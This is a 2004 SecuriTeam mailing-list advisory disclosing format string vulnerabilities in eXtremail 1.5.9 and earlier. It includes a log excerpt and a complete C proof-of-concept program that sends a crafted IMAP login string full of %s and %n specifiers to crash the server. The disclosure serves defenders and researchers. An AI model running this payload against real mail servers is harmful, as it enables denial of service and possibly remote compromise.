[UNIX] Format String Vulnerabilities in eXtremail

• Previous message: SecuriTeam: "[NT] Multiple Vulnerabilities in HP Web JetAdmin (Read, Write, Execute, Path Disclosure, Password Decryption)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 28 Apr 2004 14:05:52 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Format String Vulnerabilities in eXtremail
------------------------------------------------------------------------

SUMMARY

 <http://www.extremail.com/> eXtremail is "a closed sourced UNIX mail
server that supports SMTP/POP3/IMAP protocols. It includes support for
virtual domains, spoofing attack, SSL connection and antivirus checking".
A format string vulnerability in the product's logging mechanism allows
remote attackers to cause the product execute arbitrary code.

DETAILS

Vulnerable Systems:
 * eXtremail version 1.5.9 and prior

Multiple format string vulnerabilities exist in the logging routines of
eXtremail, allowing remote attackers to gain root privileges. This
security flaw can be exploited by supplying a specially crafted string
containing format specifiers to various SMTP, POP and IMAP commands. The
vulnerability has been reported to affect some previous versions (
<http://www.securiteam.com/exploits/5UP0L1P4LU.html> eXtremail Remote
Format String Security Vulnerability), has been reintroduced in latest
version of eXtremail.

Here is a snippet of eXtremail's log:
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 ->
SIGN - Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received

Proof of Concept:
/**********************************************
* Proof of Concept *
* eXtremail 1.5.x Denial of Service *
* *
* Luca Ercoli <luca.e [at] seeweb.com> *
* Seeweb http://www.seeweb.com *
* *
***********************************************/

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100

int main(int argc, char *argv[]);
void crash(char *host,int TYPE);

int numbytes;

void crash(char *host,int TYPE)
{

 int sockfd;
 char buf[MAXRECVSIZE];
 struct hostent *he;
 struct sockaddr_in their_addr;
 char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";

  if ((he=gethostbyname(host)) == NULL)
     {
      perror("gethostbyname");
      exit(1);
     }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
      perror("socket");
      exit(1);
     }

 their_addr.sin_family = AF_INET;
 their_addr.sin_port = htons(PORT);
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(their_addr.sin_zero), '\0', 8);

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct
sockaddr)) == -1)
     {
      perror("connect");
      exit(1);
     }

   
  if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
     {
      perror("recv");
      exit(1);
     }

 buf[numbytes] = '\0';

  if (TYPE == 0)
     {
      printf("[+] Server -> %s",buf);
      sleep(1);
      printf("\n[!] Sending malicious packet...\n");

      send(sockfd,poc, strlen(poc), 0);
      sleep(1);
      printf ("\n[+] Sent!\n");
     }

 close(sockfd);

}

int main(int argc, char *argv[])
{
    
 printf("\n\n eXtremail 1.5.x Denial of Service \n");
 printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");

  if (argc != 2)
   {
    fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
    exit(1);
   }
 
 crash(argv[1],0);
 numbytes=0;
 printf ("\n[+] Checking server status ...\n");

 if(!fork()) crash(argv[1],1);
 sleep(5);
 if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt
crashed!\n\n\n");

 return 0;

 
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:luca.e@seeweb.com> Luca
Ercoli.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] Multiple Vulnerabilities in HP Web JetAdmin (Read, Write, Execute, Path Disclosure, Password Decryption)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]